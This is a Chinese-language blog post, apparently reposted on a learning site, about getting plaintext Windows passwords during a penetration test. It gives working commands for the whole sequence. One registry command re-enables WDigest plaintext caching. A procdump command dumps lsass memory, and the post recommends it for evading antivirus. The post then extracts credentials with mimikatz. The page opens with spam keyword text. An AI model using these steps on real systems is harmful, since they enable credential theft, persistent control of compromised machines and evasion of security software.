第七色在线视频,2021少妇久久久久久久久久,亚洲欧洲精品成人久久av18,亚洲国产精品特色大片观看完整版,孙宇晨将参加特朗普的晚宴

為了賬號安全,請及時綁定郵箱和手機(jī)立即綁定

關(guān)于mimikatz無法抓取windows明文密碼的解決方法

標(biāo)簽:
Java

最近在渗透中,控下某单机后用mimikatz从内存中抓取密码,发现只抓到了hash,没有抓到明文密码,并且hash也解不出来,为了稳定控制,所以必须想办法抓出明文密码(注意键盘记录是无法记录windows的登陆密码的),于是研究了一下这个问题。在本地搭建相同环境实验后依然如此,经过查阅资料,发现微软在win7之后就打了补丁kb2871997,通过禁用Wdigest Auth来强制系统内存不保存明文口令,所以打了补丁的机器(版本较新的windows系统应该是自带的)都无法直接导出明文口令。

先放出结论,我们可以通过修改注册表来让Wdigest Auth保存明文口令:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

下面是详细的测试过程
首先测试用mimikatz直接抓,可以看到报错
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

webp

image.png


某些win10存在这种问题,一些又不存在,我也比较疑惑,不过不重要我们可以通过离线抓取的方式来规避。
在任务管理器找到lsass.exe,右键创建转储文件

webp

image.png


当然渗透环境下用procdump
procdump是微软的官方工具,不会被杀,所以如果你的mimikatz不免杀,可以用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软。
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
然后用mimikatz加载导出来的内存再抓hash,得到了hash,但是没有明文密码


sekurlsa::minidump c:\users\test\appdata\local\temp\lsass.dmpsekurlsa::logonpasswords

webp

image.png

我们修改注册表:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改了之后需要用户注销或者重启重新登陆之后才会生效

webp

image.png



作者:身自在
链接:https://www.jianshu.com/p/e56e5bfde25b


點(diǎn)擊查看更多內(nèi)容
TA 點(diǎn)贊

若覺得本文不錯,就分享一下吧!

評論

作者其他優(yōu)質(zhì)文章

正在加載中
  • 推薦
  • 評論
  • 收藏
  • 共同學(xué)習(xí),寫下你的評論
感謝您的支持,我會繼續(xù)努力的~
掃碼打賞,你說多少就多少
贊賞金額會直接到老師賬戶
支付方式
打開微信掃一掃,即可進(jìn)行掃碼打賞哦
今天注冊有機(jī)會得

100積分直接送

付費(fèi)專欄免費(fèi)學(xué)

大額優(yōu)惠券免費(fèi)領(lǐng)

立即參與 放棄機(jī)會
微信客服

購課補(bǔ)貼
聯(lián)系客服咨詢優(yōu)惠詳情

幫助反饋 APP下載

慕課網(wǎng)APP
您的移動學(xué)習(xí)伙伴

公眾號

掃描二維碼
關(guān)注慕課網(wǎng)微信公眾號

舉報

0/150
提交
取消